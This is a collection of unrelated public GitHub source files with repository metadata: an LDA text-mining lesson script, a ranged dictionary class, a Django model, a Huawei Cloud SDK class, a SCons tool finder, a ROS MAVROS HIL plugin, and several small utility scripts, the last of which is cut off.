2d192a9d9291492a2911fb5ad35382030baf8fc5 | fad34b6b81e93850e6f408bbc24b3070e002997d | /Python-DM-Text Mining-01.py | e4b51fba0851281217136c06054f5f0570c357bf | [] | no_license | Sandy4321/Latent-Dirichlet-Allocation-2 | d60c14a3abb62e05a31aaac8c9a6d9381ec9d560 | 0bf6670643c7968064e375a287448b515b077473 | refs/heads/master | 2021-05-05T09:57:17.304046 | 2017-07-26T16:14:22 | 2017-07-26T16:14:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,149 | py | ############################################################################
# Created by: Prof. Valdecy Pereira, D.Sc.
# UFF - Universidade Federal Fluminense (Brazil)
# email: valdecy.pereira@gmail.com
# Course: Data Mining
# Lesson: Text Mining
# Citation:
# PEREIRA, V. (2017). Project: LDA - Latent Dirichlet Allocation, File: Python-DM-Text Mining-01.py, GitHub repository:
# <https://github.com/Valdecy/Latent-Dirichlet-Allocation>
############################################################################
# Installing Required Libraries
import numpy as np
import pandas as pd
from nltk.tokenize import RegexpTokenizer
from random import randint
# Function: lda_tm
def lda_tm(document = [], K = 2, alpha = 0.12, eta = 0.01, iterations = 5000, dtm_matrix = False, dtm_bin_matrix = False, dtm_tf_matrix = False, dtm_tfidf_matrix = False, co_occurrence_matrix = False, correl_matrix = False):
################ Part 1 - Start of Function #############################
tokenizer = RegexpTokenizer(r'\w+')
result_list = []
# Corpus
corpus = []
for i in document:
tokens = tokenizer.tokenize(i.lower())
corpus.append(tokens)
# Corpus ID
corpus_id = []
for i in document:
tokens = tokenizer.tokenize(i.lower())
corpus_id.append(tokens)
# Unique Words
uniqueWords = []
for j in range(0, len(corpus)):
for i in corpus[j]:
if not i in uniqueWords:
uniqueWords.append(i)
# Corpus ID for Unique Words
for j in range(0, len(corpus)):
for i in range(0, len(uniqueWords)):
for k in range(0, len(corpus[j])):
if uniqueWords[i] == corpus[j][k]:
corpus_id[j][k] = i
# Topic Assignment
topic_assignment = []
for i in document:
tokens = tokenizer.tokenize(i.lower())
topic_assignment.append(tokens)
# dtm
if dtm_matrix == True or dtm_bin_matrix == True or dtm_tf_matrix == True or dtm_tfidf_matrix == True or co_occurrence_matrix == True or correl_matrix == True:
dtm = np.zeros(shape = (len(corpus), len(uniqueWords)))
for j in range(0, len(corpus)):
for i in range(0, len(uniqueWords)):
for k in range(0, len(corpus[j])):
if uniqueWords[i] == corpus[j][k]:
dtm[j][i] = dtm[j][i] + 1
dtm_pd = pd.DataFrame(dtm, columns = uniqueWords)
if dtm_matrix == True:
result_list.append(dtm_pd)
# dtm_bin
if dtm_bin_matrix == True or co_occurrence_matrix == True or correl_matrix == True:
dtm_bin = np.zeros(shape = (len(corpus), len(uniqueWords)))
for i in range(0, len(corpus)):
for j in range(0, len(uniqueWords)):
if dtm[i,j] > 0:
dtm_bin[i,j] = 1
dtm_bin_pd = pd.DataFrame(dtm_bin, columns = uniqueWords)
if dtm_bin_matrix == True:
result_list.append(dtm_bin_pd)
# dtm_tf
if dtm_tf_matrix == True:
dtm_tf = np.zeros(shape = (len(corpus), len(uniqueWords)))
for i in range(0, len(corpus)):
for j in range(0, len(uniqueWords)):
if dtm[i,j] > 0:
dtm_tf[i,j] = dtm[i,j]/dtm[i,].sum()
dtm_tf_pd = pd.DataFrame(dtm_tf, columns = uniqueWords)
result_list.append(dtm_tf_pd)
# dtm_tfidf
if dtm_tfidf_matrix == True:
idf = np.zeros(shape = (1, len(uniqueWords)))
for i in range(0, len(uniqueWords)):
idf[0,i] = np.log10(dtm.shape[0]/(dtm[:,i]>0).sum())
dtm_tfidf = np.zeros(shape = (len(corpus), len(uniqueWords)))
for i in range(0, len(corpus)):
for j in range(0, len(uniqueWords)):
dtm_tfidf[i,j] = dtm_tf[i,j]*idf[0,j]
dtm_tfidf_pd = pd.DataFrame(dtm_tfidf, columns = uniqueWords)
result_list.append(dtm_tfidf_pd)
# Co-occurrence Matrix
if co_occurrence_matrix == True:
co_occurrence = np.dot(dtm_bin.T,dtm_bin)
co_occurrence_pd = pd.DataFrame(co_occurrence, columns = uniqueWords, index = uniqueWords)
result_list.append(co_occurrence_pd)
# Correlation Matrix
if correl_matrix == True:
correl = np.zeros(shape = (len(uniqueWords), len(uniqueWords)))
for i in range(0, correl.shape[0]):
for j in range(i, correl.shape[1]):
correl[i,j] = np.corrcoef(dtm_bin[:,i], dtm_bin[:,j])[0,1]
correl_pd = pd.DataFrame(correl, columns = uniqueWords, index = uniqueWords)
result_list.append(correl_pd)
# LDA Initialization
for i in range(0, len(topic_assignment)):
for j in range(0, len(topic_assignment[i])):
topic_assignment[i][j] = randint(0, K-1)
cdt = np.zeros(shape = (len(topic_assignment), K))
for i in range(0, len(topic_assignment)):
for j in range(0, len(topic_assignment[i])):
for m in range(0, K):
if topic_assignment[i][j] == m:
cdt[i][m] = cdt[i][m] + 1
cwt = np.zeros(shape = (K, len(uniqueWords)))
for i in range(0, len(corpus)):
for j in range(0, len(uniqueWords)):
for m in range(0, len(corpus[i])):
if uniqueWords[j] == corpus[i][m]:
for n in range(0, K):
if topic_assignment[i][m] == n:
cwt[n][j] = cwt[n][j] + 1
# LDA Algorithm
for i in range(0, iterations + 1):
for d in range(0, len(corpus)):
for w in range(0, len(corpus[d])):
initial_t = topic_assignment[d][w]
word_num = corpus_id[d][w]
cdt[d,initial_t] = cdt[d,initial_t] - 1
cwt[initial_t,word_num] = cwt[initial_t,word_num] - 1
p_z = ((cwt[:,word_num] + eta) / (np.sum((cwt), axis = 1) + len(corpus) * eta)) * ((cdt[d,] + alpha) / (sum(cdt[d,]) + K * alpha ))
z = np.sum(p_z)
p_z_ac = np.add.accumulate(p_z/z)
u = np.random.random_sample()
for m in range(0, K):
if u <= p_z_ac[m]:
final_t = m
break
topic_assignment[d][w] = final_t
cdt[d,final_t] = cdt[d,final_t] + 1
cwt[final_t,word_num] = cwt[final_t,word_num] + 1
if i % 100 == 0:
print('iteration:', i)
theta = (cdt + alpha)
for i in range(0, len(theta)):
for j in range(0, K):
theta[i,j] = theta[i,j]/np.sum(theta, axis = 1)[i]
result_list.append(theta)
phi = (cwt + eta)
d_phi = np.sum(phi, axis = 1)
for i in range(0, K):
for j in range(0, len(phi.T)):
phi[i,j] = phi[i,j]/d_phi[i]
phi_pd = pd.DataFrame(phi.T, index = uniqueWords)
result_list.append(phi_pd)
return result_list
############### End of Function ##############
######################## Part 2 - Usage ####################################
# Documents
doc_1 = "data mining technique data mining first favourite technique"
doc_2 = "data mining technique data mining second favourite technique"
doc_3 = "data mining technique data mining third favourite technique"
doc_4 = "data mining technique data mining fourth favourite technique"
doc_5 = "friday play guitar"
doc_6 = "saturday will play guitar"
doc_7 = "sunday will play guitar"
doc_8 = "monday will play guitar"
doc_9 = "good good indeed can thank"
# Compile Documents
docs = [doc_1, doc_2, doc_3, doc_4, doc_5, doc_6, doc_7, doc_8, doc_9]
# Call Function
lda = lda_tm(document = docs, K = 3, alpha = 0.12, eta = 0.01, iterations = 2500, co_occurrence_matrix = True)
########################## End of Code #####################################
| [
"noreply@github.com"
] | Sandy4321.noreply@github.com |
d218fdb3fc55db678f6cdfbaae28ee4a588c899b | 205002cac7cfc03298f76ec6d053181400b2abe5 | /src/rangeddict.py | 8988d7ac3d77f346e02b7882457c588006acf989 | [
"MIT"
] | permissive | GovernorGecko/RangedDict | 1539e0b5ab26b9330c0d431e5f484123e157c11b | 7eb34fc2e682758184a495d23db9bc096b0b288d | refs/heads/main | 2023-06-04T03:35:12.187413 | 2021-06-15T19:38:49 | 2021-06-15T19:38:49 | 377,248,839 | 0 | 0 | MIT | 2021-06-15T19:38:50 | 2021-06-15T17:48:33 | null | UTF-8 | Python | false | false | 2,323 | py | """
rangeddict.py
"""
from .RedBlackTree.src.redblacktree import RedBlackTree
class RangedDict(RedBlackTree):
"""
By using RedBlackTree, we create a Ranged Dictionary.
"""
# Valid instances of data
__valid_instances = (int, float)
__slots__ = []
def __init__(self):
super(RangedDict, self).__init__(
self.__ranged_dict_comparator,
self.__ranged_dict_equals,
self.__ranged_dict_validator
)
def __getitem__(self, key):
"""
parameters:
int
returns:
var
"""
node, _ = self.find_node(key)
return node._values[0]
def __ranged_dict_comparator(self, key_one, key_two):
"""
< or >
parameters:
tuple, int, or float
tuple, int, or float
returns
bool or None
"""
if isinstance(key_one, tuple):
if key_one[1] < key_two[0]:
return True
elif key_one[0] > key_two[1]:
return False
else:
raise Exception(
f"Overlap! {key_one} already exists in some form!"
)
elif isinstance(key_one, self.__valid_instances):
if key_one < key_two[0]:
return True
return False
return None
def __ranged_dict_equals(self, key_one, key_two):
"""
=
parameters:
tuple, int, or float
tuple, int, or float
returns:
bool or None
"""
if (
isinstance(key_one, self.__valid_instances) and
key_one >= key_two[0] and key_one <= key_two[1]
):
return True
elif isinstance(key_one, tuple) and key_one == key_two:
return True
return False
def __ranged_dict_validator(self, key):
"""
Valid key data?
parameters:
tuple
tuple
returns:
bool
Returns if the given key is valid for our RBTree
"""
if isinstance(key, tuple):
for k in key:
if not isinstance(k, self.__valid_instances):
return False
return True
return False
| [
"john.lee.bunting@gmail.com"
] | john.lee.bunting@gmail.com |
c529c1ac4b3054de2460b7efedd3156896fc9f18 | d74758b5342359c607c3ed668b9334bb9f2b7f3c | /products/models.py | 8c44be24b5f226a43f14cad5e6d4716ae32899d3 | [] | no_license | Cha-K28/msp4-cking-full-stack-django | 30b0febfdaa439039b39582a6c472abdb67144d7 | ab90ff317ff925dfa63321187afcc385c8aebe8f | refs/heads/master | 2023-03-05T01:34:07.461291 | 2021-02-14T02:29:46 | 2021-02-14T02:29:46 | 331,568,899 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | from django.db import models
# Create your models here.
class Product(models.Model):
name = models.TextField()
author = models.TextField(max_length=254)
subject = models.TextField(max_length=254)
rating = models.DecimalField(max_digits=6, decimal_places=2,
null=True, blank=True)
price = models.DecimalField(max_digits=6, decimal_places=2)
year = models.CharField(max_length=254, null=True, blank=True)
image = models.ImageField(null=True, blank=True)
grade = models.CharField(max_length=254, null=True, blank=True)
def __str__(self):
return self.name
| [
"charlie@cartell.ie"
] | charlie@cartell.ie |
3e30a6a777fc7d9632db4589647703d42784d301 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-dgc/huaweicloudsdkdgc/v1/model/real_time_node_status.py | 7221161869b508adcbdee1530355437f7d8e3e9e | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,485 | py | # coding: utf-8
import re
import six
class RealTimeNodeStatus:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'name': 'str',
'status': 'str',
'log_path': 'str',
'node_type': 'str'
}
attribute_map = {
'name': 'name',
'status': 'status',
'log_path': 'logPath',
'node_type': 'nodeType'
}
def __init__(self, name=None, status=None, log_path=None, node_type=None):
"""RealTimeNodeStatus - a model defined in huaweicloud sdk"""
self._name = None
self._status = None
self._log_path = None
self._node_type = None
self.discriminator = None
if name is not None:
self.name = name
if status is not None:
self.status = status
if log_path is not None:
self.log_path = log_path
if node_type is not None:
self.node_type = node_type
@property
def name(self):
"""Gets the name of this RealTimeNodeStatus.
:return: The name of this RealTimeNodeStatus.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this RealTimeNodeStatus.
:param name: The name of this RealTimeNodeStatus.
:type: str
"""
self._name = name
@property
def status(self):
"""Gets the status of this RealTimeNodeStatus.
:return: The status of this RealTimeNodeStatus.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this RealTimeNodeStatus.
:param status: The status of this RealTimeNodeStatus.
:type: str
"""
self._status = status
@property
def log_path(self):
"""Gets the log_path of this RealTimeNodeStatus.
:return: The log_path of this RealTimeNodeStatus.
:rtype: str
"""
return self._log_path
@log_path.setter
def log_path(self, log_path):
"""Sets the log_path of this RealTimeNodeStatus.
:param log_path: The log_path of this RealTimeNodeStatus.
:type: str
"""
self._log_path = log_path
@property
def node_type(self):
"""Gets the node_type of this RealTimeNodeStatus.
:return: The node_type of this RealTimeNodeStatus.
:rtype: str
"""
return self._node_type
@node_type.setter
def node_type(self, node_type):
"""Sets the node_type of this RealTimeNodeStatus.
:param node_type: The node_type of this RealTimeNodeStatus.
:type: str
"""
self._node_type = node_type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RealTimeNodeStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
2331d0e0f00d297ccd75ec6e7683667fd0388d71 | e8315819558941a30e6dabbff9009a0a398720c6 | /4YP_PiCom_Transmitter/cat_to_bw.py | bce4481cb87368ef87dfd1d8a738f9cb4631c06c | [] | no_license | jmpotter97/4YP_PiCom | 2da19b5cb065d99715c661d360233b2a97163815 | 99b4c50cc594076a066f2b21b46a40d83b5c9143 | refs/heads/master | 2020-03-29T19:03:24.207624 | 2019-04-26T12:11:09 | 2019-04-26T12:11:09 | 150,245,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | import imageio as io
img = io.imread('cat2.jpg', pilmode = 'L')
io.imwrite('cat2_bw.jpg', img)
| [
"jmpotter97@gmail.com"
] | jmpotter97@gmail.com |
52e5fae633592567321cc89024bcd5209754514a | 078fda8280f40078f4dbfa07ce794c817582b7f5 | /oneone/wsgi.py | 608985e7d5e123ed00b17993162574124f1d8df9 | [] | no_license | sylvia198591/Bank-Application-Class-based-Views | 4c37a106b36ac76c1ccd5176d70cee76c0a7c3e5 | 404063a69b89fac15321ed8b07662e64ac4f5ba2 | refs/heads/master | 2023-03-06T16:08:30.012280 | 2021-02-23T08:29:40 | 2021-02-23T08:29:40 | 341,360,709 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
WSGI config for oneone project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'oneone.settings')
application = get_wsgi_application()
| [
"sylvia.anitha@gmail.com"
] | sylvia.anitha@gmail.com |
bf490503f9be519f8a1d25b1335c457e1faa3a3d | 0972d944bfb0352ba787deb9554a7a532b73872a | /length.py | 874220c3473c63b65a5c3e53d74b9c858bcd9e3a | [] | no_license | abhilashasancheti/CSR-Project | 8ef37dce011bb2c80928375104b9ceb98d7f4fb3 | 67e1b8a6746cf55fa6baba4b66d702ff04797a88 | refs/heads/main | 2023-05-07T00:02:22.088224 | 2021-06-01T08:53:11 | 2021-06-01T08:53:11 | 315,123,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | import os
import numpy as np
def calc_length(path):
with open(path) as f:
lines = f.readlines()
lines = [line.strip() for line in lines]
length = [len(line.split()) for line in lines]
return np.min(length), np.max(length), np.mean(length)
print("hella_p", calc_length('./HellaSwag/mtl_common_hellaswag_train.txt'))
print("joci", calc_length('./JOCI/mtl_common_joci_train.txt'))
print("anli", calc_length('./aNLI/mtl_common_anli_train.txt'))
print("defeasible", calc_length('./defeasible/mtl_common_defeasible_train.txt')) | [
"sancheti@clipsub00.umiacs.umd.edu"
] | sancheti@clipsub00.umiacs.umd.edu |
e5cc439e0b34ca33b3d001bd387a2a4479ab0b82 | 5f332fd35e0071b6c33727b1ec7b22efefd4182a | /lib/sconstool/util/finder_.py | 84618a3615bf73a74897f7ec62a7cd00982180de | [
"MIT"
] | permissive | ptomulik/scons-tool-util | ec4bc3f6971feda4fa918632b0f0431faf96779b | daab1c7db087feb988a721bf10e6b5c29c0e02b2 | refs/heads/master | 2021-08-07T12:20:17.485348 | 2020-04-15T18:48:28 | 2020-04-15T18:48:28 | 153,349,258 | 1 | 0 | null | 2020-04-15T18:49:16 | 2018-10-16T20:23:55 | Python | UTF-8 | Python | false | false | 5,721 | py | # -*- coding: utf-8 -*-
"""Provides the :class:`.ToolFinder` class.
"""
from . import misc_
import os
__all__ = ('ToolFinder',)
class ToolFinder(object):
"""Callable object which searches for executables.
A single ToolFinder instance searches for a single file (program), for
example a compiler executable or script interpreter. The constructor
accepts several options, for each option there is corresponding
@property (read-only) with the same name.
:Example: Typical use in a tool module
.. code-block:: python
from sconstool.util import ToolFinder
foo = ToolFinder('foo')
def generate(env):
env.SetDefault(FOO=foo(env))
# ...
def exists(env):
return env.get('FOO', foo(env))
"""
__slots__ = ('_tool', '_kw')
_ctor_kwargs = ('name',
'path',
'pathext',
'reject',
'priority_path',
'fallback_path',
'strip_path',
'strip_priority_path',
'strip_fallback_path')
def __init__(self, tool, **kw):
"""
:param str tool:
symbolic name of the tool,
:keyword str,list name:
base name of the file (program name) being searched for,
may be a list of alternative program names,
:keyword str,list path:
search path to be used instead of the standard SCons PATH,
:keyword str,list pathext:
a list of file extensions to be considered as executable,
:keyword list reject:
a list of paths to be rejected,
:keyword str,list priority_path:
extra search path to be searched prior to :attr:`.path`,
:keyword str,list fallback_path:
extra search path to be searched after :attr:`.path`,
:keyword bool strip_path:
if ``True`` (default), the leading path, if it's in :attr:`path`
list, will be stripped from the returned file path,
:keyword bool strip_priority_path:
if ``True``, the leading path, if it's in **priority_path**
list, will be stripped from the returned file path;
:keyword bool strip_fallback_path:
if ``True``, the leading path, if it's in **fallback_path** list,
will be stripped from the returned file path.
"""
self._tool = str(tool)
misc_.check_kwargs('ToolFinder()', kw, self._ctor_kwargs)
self._kw = kw
@property
def tool(self):
"""Tool name, that was passed in to the c-tor as an argument.
:rtype: str
"""
return self._tool
def __call__(self, env):
"""Performs the actual search.
:param env:
a SCons environment; provides construction variables and the
``env.WhereIs()`` method to the :class:`.ToolFinder`.
:return:
depending on options chosen at object creation, a name or a
path to the executable file found. If the program can't be
found, ``None`` is returned.
:rtype: str
"""
return self._search(env)
def _whereis(self, env, prog, where):
path = getattr(self, where)
if path and not isinstance(path, str):
# this trick enables variable substitution in list entries
path = os.path.pathsep.join(path)
return env.WhereIs(prog, path, self.pathext, self.reject)
def _adjust_result(self, env, result, where):
prog = env.subst(result[0])
strip = getattr(self, 'strip_%s' % where)
if os.path.isabs(prog) or strip:
return prog
return result[1]
def _search_in(self, env, where):
progs = self.name
if isinstance(progs, str):
progs = [progs]
for prog in progs:
found = self._whereis(env, prog, where)
if found:
return self._adjust_result(env, (prog, found), where)
return None
def _search(self, env):
for where in ('priority_path', 'path', 'fallback_path'):
found = self._search_in(env, where)
if found:
return found
return None
@classmethod
def _add_getter(cls, attr, default=None, **kw):
if isinstance(default, property):
default = default.fget
kw['defaultattr'] = default.__name__
doc = """\
The value of **%(attr)s** keyword argument passed in to the
constructor at object creation, or ``self.%(defaultattr)s`` if the
argument was omitted.
:rtype: %(rtype)s
"""
else:
doc = """\
The value of **%(attr)s** keyword argument passed in to the
constructor at object creation, or ``%(default)r`` if the
argument was omitted.
:rtype: %(rtype)s
"""
kw = dict({'doc': doc}, **kw)
misc_.add_ro_dict_property(cls, '_kw', attr, default, **kw)
TF = ToolFinder
TF._add_getter('name', TF.tool, rtype='str')
TF._add_getter('path', rtype='str,list')
TF._add_getter('priority_path', [], rtype='str,list')
TF._add_getter('fallback_path', [], rtype='str,list')
TF._add_getter('pathext', rtype='str,list')
TF._add_getter('reject', [], rtype='list')
TF._add_getter('strip_path', True, rtype='bool')
TF._add_getter('strip_priority_path', False, rtype='bool')
TF._add_getter('strip_fallback_path', False, rtype='bool')
del TF
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set ft=python et ts=4 sw=4:
| [
"ptomulik@meil.pw.edu.pl"
] | ptomulik@meil.pw.edu.pl |
6b0da10b62a3ac5c7cb7a4698512741531809eb2 | 5430e0a58f120136e1fca71e38477a2085af703c | /rqt_rotors/src/rqt_rotors/hil_plugin.py | a7adffcb2263211a0fe5d717f243a9a5ebda4792 | [
"Apache-2.0"
] | permissive | gsilano/CrazyS | 145fb8dd35cd3279a95d30bdd95a80a0f34e7fdd | 66d62dd52b8588c6a23258be8228e1a13646d610 | refs/heads/master | 2023-05-22T11:55:28.717481 | 2022-08-11T14:57:06 | 2022-08-11T14:57:06 | 122,210,674 | 161 | 96 | Apache-2.0 | 2022-04-02T16:09:23 | 2018-02-20T14:42:23 | C++ | UTF-8 | Python | false | false | 5,534 | py | #!/usr/bin/env python
import os
import rospy
import rospkg
from mavros_msgs.msg import State
from mavros_msgs.srv import CommandBool
from mavros_msgs.srv import CommandLong
from mavros_msgs.srv import SetMode
from qt_gui.plugin import Plugin
from python_qt_binding import loadUi
from python_qt_binding import QtCore
from python_qt_binding.QtCore import QTimer, Slot
from python_qt_binding.QtGui import QWidget, QFormLayout
import time
class HilPlugin(Plugin):
# MAV mode flags
MAV_MODE_FLAG_SAFETY_ARMED = 128
MAV_MODE_FLAG_MANUAL_INPUT_ENABLED = 64
MAV_MODE_FLAG_HIL_ENABLED = 32
MAV_MODE_FLAG_STABILIZE_ENABLED = 16
MAV_MODE_FLAG_GUIDED_ENABLED = 8
MAV_MODE_FLAG_AUTO_ENABLED = 4
MAV_MODE_FLAG_TEST_ENABLED = 2
MAV_MODE_FLAG_CUSTOM_MODE_ENABLED = 1
# MAV state dictionary
mav_state = {0: 'Uninitialized',
1: 'Booting up',
2: 'Calibrating',
3: 'Standby',
4: 'Active',
5: 'Critical',
6: 'Emergency',
7: 'Poweroff'}
# Constants
STR_ON = 'ON'
STR_OFF = 'OFF'
STR_UNKNOWN = 'N/A'
STR_MAVROS_ARM_SERVICE_NAME = '/mavros/cmd/arming'
STR_MAVROS_COMMAND_LONG_SERVICE_NAME = '/mavros/cmd/command'
STR_MAVROS_SET_MODE_SERVICE_NAME = '/mavros/set_mode'
STR_SYS_STATUS_SUB_TOPIC = '/mavros/state'
TIMEOUT_HIL_HEARTBEAT = 2.0
def __init__(self, context):
super(HilPlugin, self).__init__(context)
self.setObjectName('HilPlugin')
self._widget = QWidget()
rp = rospkg.RosPack()
ui_file = os.path.join(rospkg.RosPack().get_path('rqt_rotors'), 'resource', 'HilPlugin.ui')
loadUi(ui_file, self._widget)
self._widget.setObjectName('HilPluginUi')
if context.serial_number() > 1:
self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))
context.add_widget(self._widget)
# Set the initial parameters of UI elements
self._widget.button_set_hil_mode.setEnabled(False)
self._widget.button_arm.setEnabled(False)
self._widget.button_reboot_autopilot.setEnabled(False)
self._widget.text_state.setText(self.STR_UNKNOWN)
self.clear_mav_mode()
# Initialize class variables
self.last_heartbeat_time = time.time()
self.mav_mode = 65
self.mav_status = 255
self.armed = False
self.connected = False
self.guided = False
self.hil_enabled = False
# Set the functions that are called when signals are emitted
self._widget.button_set_hil_mode.pressed.connect(self.on_set_hil_mode_button_pressed)
self._widget.button_arm.pressed.connect(self.on_arm_button_pressed)
self._widget.button_reboot_autopilot.pressed.connect(self.on_reboot_autopilot_button_pressed)
# Create ROS service proxies
self.arm = rospy.ServiceProxy(self.STR_MAVROS_ARM_SERVICE_NAME, CommandBool)
self.send_command_long = rospy.ServiceProxy(self.STR_MAVROS_COMMAND_LONG_SERVICE_NAME, CommandLong)
self.set_mode = rospy.ServiceProxy(self.STR_MAVROS_SET_MODE_SERVICE_NAME, SetMode)
# Initialize ROS subscribers and publishers
self.sys_status_sub = rospy.Subscriber(self.STR_SYS_STATUS_SUB_TOPIC, State, self.sys_status_callback, queue_size=1)
def on_set_hil_mode_button_pressed(self):
new_mode = self.mav_mode | self.MAV_MODE_FLAG_HIL_ENABLED
self.hil_enabled = True
self.mav_mode = new_mode
self.set_mode(new_mode, '')
self._widget.text_mode_hil.setText(self.mav_mode_text(self.hil_enabled))
def on_arm_button_pressed(self):
self.arm(True)
def on_reboot_autopilot_button_pressed(self):
self.send_command_long(False, 246, 1, 1, 0, 0, 0, 0, 0, 0)
def sys_status_callback(self, msg):
if (not self.connected and msg.connected):
self._widget.button_set_hil_mode.setEnabled(True)
self._widget.button_arm.setEnabled(True)
self._widget.button_reboot_autopilot.setEnabled(True)
self.connected = True
self.last_heartbeat_time = time.time()
self._widget.text_mode_safety_armed.setText(self.mav_mode_text(msg.armed))
self._widget.text_mode_guided.setText(self.mav_mode_text(msg.guided))
return
if (((time.time() - self.last_heartbeat_time) >= self.TIMEOUT_HIL_HEARTBEAT) and self.hil_enabled):
new_mode = self.mav_mode | self.MAV_MODE_FLAG_HIL_ENABLED
self.set_mode(new_mode, '')
if (self.armed != msg.armed):
self.armed = msg.armed
self._widget.text_mode_safety_armed.setText(self.mav_mode_text(self.armed))
self._widget.button_arm.setEnabled(not(self.armed))
self.mav_mode = self.mav_mode | self.MAV_MODE_FLAG_SAFETY_ARMED
if (self.guided != msg.guided):
self.guided = msg.guided
self._widget.text_mode_guided.setText(self.mav_mode_text(self.guided))
self.last_heartbeat_time = time.time()
def clear_mav_mode(self):
count = self._widget.mav_mode_layout.rowCount()
for i in range(count):
self._widget.mav_mode_layout.itemAt(i, QFormLayout.FieldRole).widget().setText(self.STR_UNKNOWN)
def mav_mode_text(self, mode_enabled):
return self.STR_ON if mode_enabled else self.STR_OFF
def shutdown_plugin(self):
if self.sys_status_sub is not None:
self.sys_status_sub.unregister()
| [
"g.silano89@gmail.com"
] | g.silano89@gmail.com |
f6325cdee89668b585f012a30c7130e6022150fc | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /clouddirectory_write_f/schema_delete.py | 58f82c7195d72611e6c1e62d27b86b09d9f7b063 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
apply-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/apply-schema.html
create-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/create-schema.html
publish-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/publish-schema.html
update-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/update-schema.html
"""
write_parameter("clouddirectory", "delete-schema") | [
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
108d86ff6f789338762a8350d686091b3e486850 | 3c9b19eac4f1e5bda7c07f82dc609215e8b1b519 | /clean.py | be54d17850f53404d4716fb34e3bae03e2e3c36f | [] | no_license | raprakashvi/YES_NO-ALL | ab11540fc5f114981f679f7cb40b9b05f08a92dc | f514adf59556f4c676deaff5c1b5cca6eb190034 | refs/heads/main | 2023-03-22T22:40:11.524605 | 2021-03-24T03:10:37 | 2021-03-24T03:10:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,741 | py | #From Seth Adams
import matplotlib.pyplot as plt
from scipy.io import wavfile
import argparse
import os
from glob import glob
import numpy as np
import pandas as pd
from librosa.core import resample, to_mono
from tqdm import tqdm
import wavio
def envelope(y, rate, threshold):
mask = []
y = pd.Series(y).apply(np.abs)
y_mean = y.rolling(window=int(rate/20),
min_periods=1,
center=True).max()
for mean in y_mean:
if mean > threshold:
mask.append(True)
else:
mask.append(False)
return mask, y_mean
def downsample_mono(path, sr):
obj = wavio.read(path)
wav = obj.data.astype(np.float32, order='F')
rate = obj.rate
try:
channel = wav.shape[1]
if channel == 2:
wav = to_mono(wav.T)
elif channel == 1:
wav = to_mono(wav.reshape(-1))
except IndexError:
wav = to_mono(wav.reshape(-1))
pass
except Exception as exc:
raise exc
wav = resample(wav, rate, sr)
wav = wav.astype(np.int16)
return sr, wav
def save_sample(sample, rate, target_dir, fn, ix):
fn = fn.split('.wav')[0]
dst_path = os.path.join(target_dir.split('.')[0], fn+'_{}.wav'.format(str(ix)))
if os.path.exists(dst_path):
return
wavfile.write(dst_path, rate, sample)
def check_dir(path):
if os.path.exists(path) is False:
os.mkdir(path)
def split_wavs(args):
src_root = args.src_root
dst_root = args.dst_root
dt = args.delta_time
wav_paths = glob('{}/**'.format(src_root), recursive=True)
wav_paths = [x for x in wav_paths if '.wav' in x]
dirs = os.listdir(src_root)
check_dir(dst_root)
classes = os.listdir(src_root)
for _cls in classes:
target_dir = os.path.join(dst_root, _cls)
